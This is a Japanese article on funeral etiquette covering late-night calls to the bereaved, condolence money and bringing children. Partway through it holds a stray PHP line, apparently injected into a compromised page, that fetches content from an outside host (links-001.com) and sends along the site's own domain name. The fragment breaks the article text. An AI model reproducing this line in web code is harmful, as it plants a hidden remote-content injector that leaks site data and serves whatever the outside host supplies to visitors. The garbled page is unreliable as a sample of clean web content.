前へ
次へ

対面の作法と焼香の仕方に関する葬儀マナー

葬儀に参列し、故人に対面する時、遺族が白布を取ってくれる場合は、まず、遺族に請われたら故人の枕元へ静

more

案外難しい葬儀マナーの解釈

女性が日本国内で葬儀に出席される場合に大いに悩む点があります。
それは女性が葬儀で履く靴です。

more

葬儀マナーによると適切なのは布製のパンプス

日本の成人女性が葬儀に出席する際には、特にその履物に注意する必要があります。
葬儀マナーに違反

more

間違いやすい葬儀マナーとは

意外と間違ってしまう人が多い葬儀マナーがいくつもあります。
いつ、親しい人が亡くなるのかはわかりません。
あまり体調が良くないのならば覚悟できますが、事故などで急に亡くなる人もいます。
急に訃報に接することもありますし、葬儀へ行く際には葬儀マナーをおさらいしておきませんか。
自信を持っている人も間違っていることがあるかもしれないので、事前にやってはいけないことを調べるなどしておいた方が良いでしょう。
訃報を聞いたら、すぐに連絡した方が良いと思っていませんか。
それがどんな時間帯であっても連絡すべきだと思い、夜中に訃報を聞いて遺族の元に駆けつけることがあるかもしれません。
しかし、さすがに夜中は連絡を避けた方が良いです。
すぐにでも故人と会っておきたくなるかもしれませんが、葬儀に参列した時に最期の挨拶をしましょう。
または、遺族の方から連絡があり、勧められてから駆けつけるようにします。
自分から足を運ぶのはやめましょう。
葬儀に参列する時、香典を渡しますがこの時にもマナーがあります。
新札を入れるのは避けてください。
おめでたい時であれば良いのですが、悲しい時には折り目のついたお札にします。
新札を包んでしまうとあらかじめ死期が近いと思って用意していたと思われるからです。
できればあまり幼い子供を連れて行かないようにした方が良いです。
ぐずってしまうような年頃の子供は周りにも迷惑になります。
ぐずらないようになっていれば子供も参列して構いません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

葬儀マナーはいろいろとありますので、大丈夫なように見えても意外と良くないことが多々あります。
宗派によって違いがありますし、間違った振る舞いをしないように気を付けましょう。
周りと合わせておけば間違ったマナーをしなくて済みます。
キリスト式の場合はお悔やみと言う言葉を使わないようにするなど言葉遣いにも気を配る必要があります。
細かく見てみると難しく感じることもありますが、失礼のないように確認はした方が良いです。

Page Top